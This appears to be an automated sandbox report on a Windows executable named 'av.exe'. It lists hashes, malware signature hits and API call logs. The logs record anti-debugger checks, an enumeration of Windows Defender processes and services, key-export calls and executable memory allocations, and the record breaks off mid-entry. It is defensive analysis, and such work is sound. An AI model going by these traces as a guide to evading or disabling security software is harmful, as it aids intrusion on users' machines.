Summary | ZeroBOX

av.exe

Gen1 Generic Malware PhysicalDrive Malicious Library Malicious Packer WinRAR Downloader Antivirus Confuser .NET UPX HTTP DNS ScreenShot Create Service Internet API DGA Http API Socket Escalate priviledges Code injection PWS Sniff Audio Steal credential
Category Machine Started Completed
FILE s1_win7_x6401 Dec. 18, 2024, 4:13 p.m. Dec. 18, 2024, 4:15 p.m.
Size 2.6MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 c5ca67c0bbc8b248cea971121e96e93d
SHA256 7d20203ad3c9a9576b42f48d5dccba051ef145b6ccb386828d88638e3c27c9ee
CRC32 594019AB
ssdeep 49152:NvRSokUKCQjooKHq6DOTAKnPlCDmFTjGXg34n6ffMg7EkcluuCJaiNMouHA:NorUZQkoCfkP0DmFTjkgiafMgyViNZug
PDB Path D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • Win32_WinRAR_SFX_Zero - Win32 WinRAR SFX
  • IsPE32 - (no description)
  • Generic_Malware_Zero - Generic Malware
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Состояние процессов защитника:
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: SmartScreen
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: MsMpEng
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Antimalware Service Executable]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: SgrmBroker
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Брокер среды выполнения System Guard]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: uhssvc
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Microsoft Update Health Service]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: NisSrv
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Network Realtime Inspection]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: MpCmdRun
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Microsoft malware protection]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: MPSigStub
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Malware Protection Signature Update Stub]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: SHealthUI
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Безопасность Windows]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: HealthTray
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [SecurityHealthSystray иконка в трее]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: HealthServ
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [SecurityHealthService]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: HealthHost
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [SecurityHealthHost]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: Состояние служб и драйверов защитника:
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: webthreat
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Служба защиты от Веб-угроз - webthreatdefsvc]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: webthreatu
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Служба защиты пользоват. от Веб-угроз - webthreatdefusersvc]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: WinDefend
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Служба Антивирусная программа Защитника Windows]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: WdNisSvc
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Служба проверки сети Windows Defender Antivirus]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: Sense
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Служба Advanced Threat Protection]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: wscsvc
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Служба Центр обеспечения безопасности]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: SgrmBroker
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Служба Брокер мониторинга среды выполнения System Guard]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: SHealthSer
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Служба Центр безопасности Защитника Windows]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: WdNisDrv
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Драйвер WD Network Inspection Driver]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: WdBoot
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Драйвер WD Antivirus Boot Driver]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: WdFilter
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Драйвер WD Antivirus Mini-Filter Driver]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: SgrmAgent
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Драйвер System Guard Runtime Monitor Agent Driver]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: wtd
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: [Драйвер WTD Driver]
console_handle: 0x00000003
1 1 0

WriteConsoleW

buffer: MsSecWfp
console_handle: 0x00000003
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000352570
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5396c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5396c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5396c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5399d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5399d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5396c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5396c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5396c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5396c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b539c00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b539c00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b539c00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b539730
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b539730
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b539730
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5396c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5396c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5396c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5396c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5396c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5396c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5396c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5396c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b539730
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b539730
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b539730
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b539730
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b539730
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b539c00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b539c00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53a1b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53a1b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b53a1b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000336950
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000336950
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000336950
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000336950
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b55d640
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b55d640
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5396c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5396c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b55db80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b55db80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b55db80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b55db80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file C:\Program Files\Mozilla Firefox\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .didat
resource name PNG
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x75aad08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x75aa964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x75a94d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x75a96f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x75a9e825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x75a96002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x75a95fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x75a949e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x75a95a20
RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x76f49a91
LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x76f68f10
RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x76f68e5c
ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x755c7a25
nhmb+0x2d98c @ 0xb7d98c
nhmb+0x2d956 @ 0xb7d956
nhmb+0x2daee @ 0xb7daee
nhmb+0x252f0 @ 0xb752f0
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x75ac3ef4
registers.esp: 3602000
registers.edi: 0
registers.eax: 47484464
registers.ebp: 3602028
registers.edx: 1
registers.ebx: 0
registers.esi: 5995400
registers.ecx: 1924478428
1 0 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72dd2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3980
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72dd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 1048576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002810000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002890000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef31d1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef344e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef344e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef344f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef344f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef344f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef344f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef344f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef344f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef344f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef344f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3450000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3450000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3450000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3450000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3450000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3451000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3451000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3451000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3451000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef344e000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00052000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0010a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002892000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002894000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0011a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00053000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00054000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00142000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0011d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0010b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00102000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00055000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00190000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
